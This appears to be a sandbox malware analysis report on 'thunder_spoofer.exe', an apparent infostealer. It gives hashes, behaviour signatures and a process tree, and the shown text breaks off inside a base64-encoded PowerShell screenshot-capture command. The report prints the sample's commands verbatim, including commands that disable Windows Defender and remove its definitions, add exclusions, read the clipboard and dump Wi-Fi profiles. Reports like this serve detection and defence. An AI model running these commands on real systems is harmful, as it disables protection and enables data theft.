Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-12-2024 23:02
Behavioral task
behavioral1
Sample
thunder_spoofer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
thunder_spoofer.exe
Resource
win10v2004-20241007-en
General
-
Target
thunder_spoofer.exe
-
Size
7.4MB
-
MD5
9cc49342e97f2f55404e002037e348b6
-
SHA1
e53603b32c7bdbd7ad80aee516a721d205dc15a2
-
SHA256
4c0823ae37b673627a8203606c3f852c70e8d6908eae446cb24cda7538e2b1da
-
SHA512
72bded4aaa8a745099482a676b7cd3cbd9acd3ba619903fa7620832bffaca9f849884e90977402100e4da075d3493f2aeca4dd79ee863b50f06b69a22302bc14
-
SSDEEP
98304:vNeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTbJ7Bv9JTSPhlVtQo1Q:voYmOshoKMuIkhVastRL5Di3tKJtSPJI
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2432 powershell.exe 3412 powershell.exe 2200 powershell.exe 624 powershell.exe 4520 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts thunder_spoofer.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4356 cmd.exe 4976 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1240 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe 2156 thunder_spoofer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 33 discord.com 34 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com 28 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 2872 tasklist.exe 1504 tasklist.exe 4928 tasklist.exe 228 tasklist.exe 3580 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2992 cmd.exe -
resource yara_rule behavioral2/files/0x0007000000023cb1-21.dat upx behavioral2/memory/2156-25-0x00007FFC86050000-0x00007FFC86639000-memory.dmp upx behavioral2/files/0x0007000000023ca6-27.dat upx behavioral2/files/0x0007000000023caf-29.dat upx behavioral2/memory/2156-30-0x00007FFC89E80000-0x00007FFC89EA3000-memory.dmp upx behavioral2/memory/2156-33-0x00007FFC8FAD0000-0x00007FFC8FADF000-memory.dmp upx behavioral2/files/0x0007000000023ca9-38.dat upx behavioral2/memory/2156-40-0x00007FFC89D40000-0x00007FFC89D6D000-memory.dmp upx behavioral2/files/0x0007000000023ca5-41.dat upx behavioral2/memory/2156-43-0x00007FFC8CCA0000-0x00007FFC8CCB9000-memory.dmp upx behavioral2/files/0x0007000000023cac-44.dat upx behavioral2/memory/2156-47-0x00007FFC89C70000-0x00007FFC89C93000-memory.dmp upx behavioral2/files/0x0007000000023cb4-46.dat upx behavioral2/memory/2156-49-0x00007FFC86710000-0x00007FFC86887000-memory.dmp upx behavioral2/files/0x0007000000023cab-50.dat upx behavioral2/memory/2156-53-0x00007FFC8C2B0000-0x00007FFC8C2C9000-memory.dmp upx behavioral2/files/0x0007000000023cb3-52.dat upx behavioral2/files/0x0007000000023cad-55.dat upx behavioral2/memory/2156-56-0x00007FFC89E70000-0x00007FFC89E7D000-memory.dmp upx behavioral2/files/0x0007000000023cb0-60.dat upx behavioral2/files/0x0007000000023cae-58.dat upx behavioral2/memory/2156-59-0x00007FFC86BA0000-0x00007FFC86BD3000-memory.dmp upx behavioral2/memory/2156-67-0x00007FFC771F0000-0x00007FFC77710000-memory.dmp upx behavioral2/memory/2156-68-0x00007FFC89E80000-0x00007FFC89EA3000-memory.dmp upx behavioral2/files/0x0007000000023cb5-76.dat upx behavioral2/memory/2156-77-0x00007FFC770D0000-0x00007FFC771EC000-memory.dmp upx behavioral2/memory/2156-74-0x00007FFC89E60000-0x00007FFC89E6D000-memory.dmp upx behavioral2/files/0x0007000000023caa-73.dat upx behavioral2/memory/2156-72-0x00007FFC89D20000-0x00007FFC89D34000-memory.dmp upx behavioral2/files/0x0007000000023ca8-70.dat upx behavioral2/memory/2156-65-0x00007FFC86AD0000-0x00007FFC86B9D000-memory.dmp upx behavioral2/memory/2156-64-0x00007FFC86050000-0x00007FFC86639000-memory.dmp upx behavioral2/memory/2156-98-0x00007FFC89C70000-0x00007FFC89C93000-memory.dmp upx behavioral2/memory/2156-116-0x00007FFC86710000-0x00007FFC86887000-memory.dmp upx behavioral2/memory/2156-191-0x00007FFC8C2B0000-0x00007FFC8C2C9000-memory.dmp upx behavioral2/memory/2156-276-0x00007FFC86BA0000-0x00007FFC86BD3000-memory.dmp upx behavioral2/memory/2156-278-0x00007FFC86AD0000-0x00007FFC86B9D000-memory.dmp upx behavioral2/memory/2156-297-0x00007FFC771F0000-0x00007FFC77710000-memory.dmp upx behavioral2/memory/2156-314-0x00007FFC86710000-0x00007FFC86887000-memory.dmp upx behavioral2/memory/2156-308-0x00007FFC86050000-0x00007FFC86639000-memory.dmp upx behavioral2/memory/2156-309-0x00007FFC89E80000-0x00007FFC89EA3000-memory.dmp upx behavioral2/memory/2156-348-0x00007FFC770D0000-0x00007FFC771EC000-memory.dmp upx behavioral2/memory/2156-344-0x00007FFC86AD0000-0x00007FFC86B9D000-memory.dmp upx behavioral2/memory/2156-343-0x00007FFC86BA0000-0x00007FFC86BD3000-memory.dmp upx behavioral2/memory/2156-342-0x00007FFC89E70000-0x00007FFC89E7D000-memory.dmp upx behavioral2/memory/2156-341-0x00007FFC8C2B0000-0x00007FFC8C2C9000-memory.dmp upx behavioral2/memory/2156-340-0x00007FFC86710000-0x00007FFC86887000-memory.dmp upx behavioral2/memory/2156-339-0x00007FFC89C70000-0x00007FFC89C93000-memory.dmp upx behavioral2/memory/2156-338-0x00007FFC8CCA0000-0x00007FFC8CCB9000-memory.dmp upx behavioral2/memory/2156-337-0x00007FFC89D40000-0x00007FFC89D6D000-memory.dmp upx behavioral2/memory/2156-336-0x00007FFC8FAD0000-0x00007FFC8FADF000-memory.dmp upx behavioral2/memory/2156-335-0x00007FFC89E80000-0x00007FFC89EA3000-memory.dmp upx behavioral2/memory/2156-334-0x00007FFC86050000-0x00007FFC86639000-memory.dmp upx behavioral2/memory/2156-347-0x00007FFC89E60000-0x00007FFC89E6D000-memory.dmp upx behavioral2/memory/2156-346-0x00007FFC89D20000-0x00007FFC89D34000-memory.dmp upx behavioral2/memory/2156-349-0x00007FFC771F0000-0x00007FFC77710000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5032 cmd.exe 4736 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4744 cmd.exe 1140 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2300 WMIC.exe 2820 WMIC.exe 4592 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2316 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4736 PING.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2200 powershell.exe 2432 powershell.exe 2200 powershell.exe 2432 powershell.exe 3412 powershell.exe 3412 powershell.exe 4976 powershell.exe 4976 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 4976 powershell.exe 624 powershell.exe 624 powershell.exe 3144 powershell.exe 3144 powershell.exe 4520 powershell.exe 4520 powershell.exe 5108 powershell.exe 5108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 348 WMIC.exe Token: SeSecurityPrivilege 348 WMIC.exe Token: SeTakeOwnershipPrivilege 348 WMIC.exe Token: SeLoadDriverPrivilege 348 WMIC.exe Token: SeSystemProfilePrivilege 348 WMIC.exe Token: SeSystemtimePrivilege 348 WMIC.exe Token: SeProfSingleProcessPrivilege 348 WMIC.exe Token: SeIncBasePriorityPrivilege 348 WMIC.exe Token: SeCreatePagefilePrivilege 348 WMIC.exe Token: SeBackupPrivilege 348 WMIC.exe Token: SeRestorePrivilege 348 WMIC.exe Token: SeShutdownPrivilege 348 WMIC.exe Token: SeDebugPrivilege 348 WMIC.exe Token: SeSystemEnvironmentPrivilege 348 WMIC.exe Token: SeRemoteShutdownPrivilege 348 WMIC.exe Token: SeUndockPrivilege 348 WMIC.exe Token: SeManageVolumePrivilege 348 WMIC.exe Token: 33 348 WMIC.exe Token: 34 348 WMIC.exe Token: 35 348 WMIC.exe Token: 36 348 WMIC.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeIncreaseQuotaPrivilege 348 WMIC.exe Token: SeSecurityPrivilege 348 WMIC.exe Token: SeTakeOwnershipPrivilege 348 WMIC.exe Token: SeLoadDriverPrivilege 348 WMIC.exe Token: SeSystemProfilePrivilege 348 WMIC.exe Token: SeSystemtimePrivilege 348 WMIC.exe Token: SeProfSingleProcessPrivilege 348 WMIC.exe Token: SeIncBasePriorityPrivilege 348 WMIC.exe Token: SeCreatePagefilePrivilege 348 WMIC.exe Token: SeBackupPrivilege 348 WMIC.exe Token: SeRestorePrivilege 348 WMIC.exe Token: SeShutdownPrivilege 348 WMIC.exe Token: SeDebugPrivilege 348 WMIC.exe Token: SeSystemEnvironmentPrivilege 348 WMIC.exe Token: SeRemoteShutdownPrivilege 348 WMIC.exe Token: SeUndockPrivilege 348 WMIC.exe Token: SeManageVolumePrivilege 348 WMIC.exe Token: 33 348 WMIC.exe Token: 34 348 WMIC.exe Token: 35 348 WMIC.exe Token: 36 348 WMIC.exe Token: SeDebugPrivilege 228 tasklist.exe Token: SeIncreaseQuotaPrivilege 2820 WMIC.exe Token: SeSecurityPrivilege 2820 WMIC.exe Token: SeTakeOwnershipPrivilege 2820 WMIC.exe Token: SeLoadDriverPrivilege 2820 WMIC.exe Token: SeSystemProfilePrivilege 2820 WMIC.exe Token: SeSystemtimePrivilege 2820 WMIC.exe Token: SeProfSingleProcessPrivilege 2820 WMIC.exe Token: SeIncBasePriorityPrivilege 2820 WMIC.exe Token: SeCreatePagefilePrivilege 2820 WMIC.exe Token: SeBackupPrivilege 2820 WMIC.exe Token: SeRestorePrivilege 2820 WMIC.exe Token: SeShutdownPrivilege 2820 WMIC.exe Token: SeDebugPrivilege 2820 WMIC.exe Token: SeSystemEnvironmentPrivilege 2820 WMIC.exe Token: SeRemoteShutdownPrivilege 2820 WMIC.exe Token: SeUndockPrivilege 2820 WMIC.exe Token: SeManageVolumePrivilege 2820 WMIC.exe Token: 33 2820 WMIC.exe Token: 34 2820 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1700 mshta.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2312 wrote to memory of 2156 2312 thunder_spoofer.exe 81 PID 2312 wrote to memory of 2156 2312 thunder_spoofer.exe 81 PID 2156 wrote to memory of 764 2156 thunder_spoofer.exe 82 PID 2156 wrote to memory of 764 2156 thunder_spoofer.exe 82 PID 2156 wrote to memory of 3156 2156 thunder_spoofer.exe 83 PID 2156 wrote to memory of 3156 2156 thunder_spoofer.exe 83 PID 2156 wrote to memory of 264 2156 thunder_spoofer.exe 84 PID 2156 wrote to memory of 264 2156 thunder_spoofer.exe 84 PID 2156 wrote to memory of 428 2156 thunder_spoofer.exe 88 PID 2156 wrote to memory of 428 2156 thunder_spoofer.exe 88 PID 2156 wrote to memory of 3456 2156 thunder_spoofer.exe 90 PID 2156 wrote to memory of 3456 2156 thunder_spoofer.exe 90 PID 3156 wrote to memory of 2200 3156 cmd.exe 92 PID 3156 wrote to memory of 2200 3156 cmd.exe 92 PID 3456 wrote to memory of 348 3456 cmd.exe 93 PID 3456 wrote to memory of 348 3456 cmd.exe 93 PID 264 wrote to memory of 1700 264 cmd.exe 94 PID 264 wrote to memory of 1700 264 cmd.exe 94 PID 764 wrote to memory of 2432 764 cmd.exe 95 PID 764 wrote to memory of 2432 764 cmd.exe 95 PID 428 wrote to memory of 228 428 cmd.exe 96 PID 428 wrote to memory of 228 428 cmd.exe 96 PID 2156 wrote to memory of 964 2156 thunder_spoofer.exe 144 PID 2156 wrote to memory of 964 2156 thunder_spoofer.exe 144 PID 964 wrote to memory of 3360 964 cmd.exe 100 PID 964 wrote to memory of 3360 964 cmd.exe 100 PID 2156 wrote to memory of 4412 2156 thunder_spoofer.exe 101 PID 2156 wrote to memory of 4412 2156 thunder_spoofer.exe 101 PID 4412 wrote to memory of 1784 4412 cmd.exe 103 PID 4412 wrote to memory of 1784 4412 cmd.exe 103 PID 2156 wrote to memory of 2616 2156 thunder_spoofer.exe 104 PID 2156 wrote to memory of 2616 2156 thunder_spoofer.exe 104 PID 2616 wrote to memory of 2820 2616 cmd.exe 106 PID 2616 wrote to memory of 2820 2616 cmd.exe 106 PID 2156 wrote to memory of 932 2156 thunder_spoofer.exe 107 PID 2156 wrote to memory of 932 2156 thunder_spoofer.exe 107 PID 932 wrote to memory of 4592 932 cmd.exe 110 PID 932 wrote to memory of 4592 932 cmd.exe 110 PID 2156 wrote to memory of 2992 2156 thunder_spoofer.exe 111 PID 2156 wrote to memory of 2992 2156 thunder_spoofer.exe 111 PID 2156 wrote to memory of 3736 2156 thunder_spoofer.exe 113 PID 2156 wrote to memory of 3736 2156 thunder_spoofer.exe 113 PID 2992 wrote to memory of 1968 2992 cmd.exe 115 PID 2992 wrote to memory of 1968 2992 cmd.exe 115 PID 3736 wrote to memory of 3412 3736 cmd.exe 116 PID 3736 wrote to memory of 3412 3736 cmd.exe 116 PID 2156 wrote to memory of 2368 2156 thunder_spoofer.exe 117 PID 2156 wrote to memory of 2368 2156 thunder_spoofer.exe 117 PID 2156 wrote to memory of 3576 2156 thunder_spoofer.exe 118 PID 2156 wrote to memory of 3576 2156 thunder_spoofer.exe 118 PID 2156 wrote to memory of 1500 2156 thunder_spoofer.exe 121 PID 2156 wrote to memory of 1500 2156 thunder_spoofer.exe 121 PID 3576 wrote to memory of 2872 3576 cmd.exe 122 PID 3576 wrote to memory of 2872 3576 cmd.exe 122 PID 2156 wrote to memory of 4356 2156 thunder_spoofer.exe 124 PID 2156 wrote to memory of 4356 2156 thunder_spoofer.exe 124 PID 2368 wrote to memory of 3580 2368 cmd.exe 125 PID 2368 wrote to memory of 3580 2368 cmd.exe 125 PID 2156 wrote to memory of 2124 2156 thunder_spoofer.exe 127 PID 2156 wrote to memory of 2124 2156 thunder_spoofer.exe 127 PID 2156 wrote to memory of 5116 2156 thunder_spoofer.exe 129 PID 2156 wrote to memory of 5116 2156 thunder_spoofer.exe 129 PID 2156 wrote to memory of 4744 2156 thunder_spoofer.exe 130 PID 2156 wrote to memory of 4744 2156 thunder_spoofer.exe 130 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 1968 attrib.exe 2040 attrib.exe 4816 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Datei konnte nicht gelesen werden.', 0, 'Fehlercode (7xAmalrkL6)', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Datei konnte nicht gelesen werden.', 0, 'Fehlercode (7xAmalrkL6)', 0+16);close()"4⤵
- Suspicious use of FindShellTrayWindow
PID:1700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:1784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"4⤵
- Views/modifies file attributes
PID:1968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:1500
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2124
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5116
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4744 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3132
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:724
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIA